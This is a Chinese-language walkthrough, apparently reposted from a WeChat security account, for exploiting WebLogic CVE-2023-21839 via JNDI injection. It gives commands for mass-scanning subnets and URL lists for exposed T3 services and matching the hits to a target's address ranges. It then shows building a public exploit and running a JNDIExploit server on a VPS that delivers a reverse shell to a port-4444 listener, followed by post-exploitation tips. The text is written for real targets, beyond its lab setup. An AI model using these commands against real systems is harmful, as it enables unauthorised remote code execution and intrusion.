0x00 实验环境
攻击机:Windows
靶场:vulhub 12.2.1.3环境
0x01 影响版本
允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致 RCE 漏洞
WebLogic_Server = 12.2.1.3.0WebLogic_Server = 12.2.1.4.0WebLogic_Server = 14.1.1.0.0
0x02 漏洞复现
(1)Ladon T3info模块探测 weblogic版本
探测到版本代表开启T3协议 版本符合可尝试是否存在漏洞
Ladon noping 192.168.188.2/24 T3infoLadon 192.168.188.2:7001 T3infoLadon http://192.168.188.2:7001 T3infoLadon url.txt T3infoLadon noping ip.txt T3infoLadonGo对应模块为T3scan
相关搜索引擎导出url,然后批量检测T3协议
Ladon url.txt T3info > T3ver.txt当然也可以直接检测目标C段是否存在weblogic
Ladon noping ip24.txt T3info > T3ver.txtLadon noping 192.168.1.8/24 T3info > T3ver.txt
(2)FindIP模块匹配目标
Key.txt存放LadonGUI处理的目标C段,当然手动也可以,使用
Ladon FindIP key.txt T3ver.txt匹配C段是否出现在结果中,出现则有可能与目标有关,可以尝试GetShell
(3)使用网上开源工具https://github.com/4ra1n/CVE-2023-21839
GO编译
go build -o CVE-2023-21839.exe(4)漏洞检测
通过Ladon监听,无需dnslog等,不会向第3方泄露授权检测站点漏洞信息,部署在目标内网也可解决目标内网不出网无法利用目标内网存在相关漏洞的问题。
Ladon 监听命令:
Ladon web 800
使用20230228后版本,不然批量LDAP时可能会崩溃
exp测试漏洞
exp.exe -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:800
Ladon监听出现JNDI_LDAP字符串 代表存在JNDI注入漏洞
(4)反弹shell:
使用JNDI漏洞利用工具,在VPS开启服务,监听1389端口。
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.188.2 -l 1389 -p 9999
(5)在VPS上使用Ladon监听端口:
Ladon NC监听 4444
(6)在渗透机上执行以下命令
CVE-2023-21839 -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:1389/Basic/ReverseShell/192.168.188.2/4444
(7)成功getshell
接下来就可以执行任意命令,linux也可以使用自带NC监听,对于windows可使用PowerLadon内存加载后渗透。
Ladon 10.9 20230302[]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$[]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求[]WebLogicPoc CVE-2020-14883高危漏洞检测可识别出Windows或Linux[]PortTran CS版移除 端口转发工具[]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)[]Help 仅911版保留 功能很多 建议看Wiki或Ladon Study[]SMBGhost 仅CS和911版保留 Win10默认自动更新,实战遇到概率低[]vsFTPdPoc 仅CS和911版保留 2011漏洞过旧,实战遇到概率低[]CVE-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低[]PhpStudyPoc 仅CS和911版保留
原文始发于微信公众号(K8实验室):Ladon漏洞复现 CVE 2023-21839 weblogic
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论